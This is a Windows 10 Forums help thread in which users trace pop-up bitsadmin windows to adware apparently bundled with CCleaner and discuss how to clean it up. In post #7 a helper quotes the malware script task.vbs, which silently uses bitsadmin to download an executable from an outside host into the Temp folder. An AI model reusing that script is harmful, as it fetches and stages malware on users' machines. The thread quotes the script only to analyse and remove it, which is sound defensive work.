Bitsadmin pops up randomly and immediatly disappears (take 2?)

Page 1 of 3 123 LastLast

  1. Posts : 6
    Windows 10
       #1

    Bitsadmin pops up randomly and immediatly disappears (take 2?)


    I hate to start naming people off here like an assembly line, but I find myself in the same situation as @tkrisz0403 in that my Command Prompt, accompanied by the exact same text as the former case, as seen in the first screen shot I provide which I managed to capture using OBS studio (please feel free to snoop through my dungeons and dragons writing at your leisure . I proceeded to follow some of the advice provide by @Hydranix and @Superfly by proceeding to download the bitsadmin buster.zip, which did promptly catch and freeze the process. The txt it provided was also identical, "Parent Process Name: cmd.exe" (of which I'll also produce a screenshot, mainly because I'm not knowledgeable enough to do anything else in a forum)

    I then went on with further with the instructions in that particular forum, first entering "Get-BitsTransfer -AllUsers | select -ExpandProperty FileList | Select -ExpandProperty RemoteName" into powershell as recommended by @Superfly, which gave me slightly different results. Still, cloudfront.net appeared to be the issue, as it came up in an almost identical fashion as in @tkrisz0403 's case. I proceeded to enter the command prompt provided by @Superfly;

    "@echo off
    net stop BITS
    ipconfig /flushdns
    del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
    del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
    net start BITS

    net stop wuauserv
    net start wuauserv"

    It was at this point the results appeared different enough that I, not being an expert in this field, didn't want to go any further, the results of which again being posted in a screen shot. I've downloaded ADWcleaner, which was the next recommended step to check for the possibility of malware, which I firmly believe it is, but have ceased to move forward until some fine chap comes along and tells me "Aw, you adorable little monkey, here, do this," and out of the kindness of their hearts decides to guide me through this process. I hope to hear from anyone and everyone soon, and I drink to your health and good fortune. Cheers ... (Hm, that emoji doesn't quite do me justice. I'm not a drunk, I'm just Irish, I swear.)

    P.S. As an additional update, while typing this, I do believe I did see the command prompt pop up again, though I wasn't thoroughly paying attention and cannot be certian. Could be paranoia. Could the buster ceased to work after a time. I'm not sure. As an additional precaution, I'm posing yet another screen of the command prompt that stayed after downloading and executing the bitsadmin buster.exe, though it is and has been completely blank. If there is any other information I can provide, I won't hesitate to do so.
    Attached Thumbnails Attached Thumbnails Bitsadmin pops up randomly and immediatly disappears (take 2?)-screenshot-2-.png   Bitsadmin pops up randomly and immediatly disappears (take 2?)-screenshot-3-.png   Bitsadmin pops up randomly and immediatly disappears (take 2?)-screenshot-4-.png   Bitsadmin pops up randomly and immediatly disappears (take 2?)-screenshot-5-.png   Bitsadmin pops up randomly and immediatly disappears (take 2?)-screenshot-6-.png  

      My Computer


  2. Posts : 3,105
    W10 Pro + W10 Preview
       #2

    Its a Google toolbar usually bundled with Ccleaner....a snooper, potentially unsafe.
    To eradicate in Safe Mode...Hitman Pro or ADWcleaner.
      My Computers


  3. Posts : 4,224
    Windows 10
       #3

    Just a quick fyi for CCleaner users (like me): one week after a new edition hits their CCleaner builds page, they post a "slim" version of the program that has no bundleware in it at all. If you're willing to wait, you can skip that extra add-in altogether.
    Bitsadmin pops up randomly and immediatly disappears (take 2?)-ccblds.jpg
    For example, ccsetup524.exe showed up on the site on Monday, Nov 14, I believe. That means ccsetup524-slim.exe should show up on 11/21. I'll wait to download and install that one, instead of the "Standard installer" version.
    HTH,
    --Ed--
      My Computers


  4. Posts : 3,105
    W10 Pro + W10 Preview
       #4

    Thanks for tip Ed....a bit naughty in the first place CCleaner not notifying installed bundleware came with the package.
      My Computers


  5. Posts : 3,453
       #5

    I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.

    See here for removal instructions.
      My Computer


  6. Posts : 3,105
    W10 Pro + W10 Preview
       #6

    Superfly said:
    I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.

    See here for removal instructions.
    Confirmation of what was installed with CCleaner.....note the name change from your posted link but unmistakable connection.
    Attached Thumbnails Attached Thumbnails Bitsadmin pops up randomly and immediatly disappears (take 2?)-tasks.png  
      My Computers


  7. Posts : 3,453
       #7

    OK, thanx for checking that out - what we need to do now, is find that script and see what it calls via bitsadmin.

    PS: Assuming we are on the right path with this....

    The task.vbs apparently contains this:

    Code:
    Set WshShell = CreateObject("WScript.Shell")
    
    cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe C:\Users\Tejas\AppData\Local\Temp\amiupdater912.exe",0,False)
    
    WScript.Sleep 300000
    
    cmds=WshShell.RUN("bitsadmin /cancel amijob",0,False)
    
    Set WshShell = Nothing
    It creates a bits job called "amijob" then downloads an updater exe to the temp folder. Waits a set period (I guess for the download to complete), it then cancels the bitsjob. Assuming another task then runs the updater from temp.

    Info: Malware scan of task.vbs 04f5d27e461b2ff0da24b6a367b81d6d4d3c817d - Reason Core Security Labs
    Last edited by Superfly; 16 Nov 2016 at 13:57.
      My Computer


  8. Posts : 3,105
    W10 Pro + W10 Preview
       #8

    Quite a lot on my machine.....red markings my name.....how to differentiate between M$ and any intruder?...I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
    Attached Thumbnails Attached Thumbnails Bitsadmin pops up randomly and immediatly disappears (take 2?)-bits.png  
      My Computers


  9. Posts : 3,453
       #9

    Those are fine - they are just the executable and dependencies in the components folder... it's the hidden scripts that call it, that's the problem.
      My Computer


  10. Posts : 5,478
    2004
       #10

    dencal said:
    I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
    A bit off topic this but bitlocker will not do anything to stop you getting infected. Whether you have it turned on or not is transparent to programs running on your PC. It is to stop people getting information off your disk if you leave your laptop in a taxi or whatever.
      My Computer


 

  Related Discussions
Our Sites
Site Links
About Us
Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd
All times are GMT -5. The time now is 07:10.
Find Us




Windows 10 Forums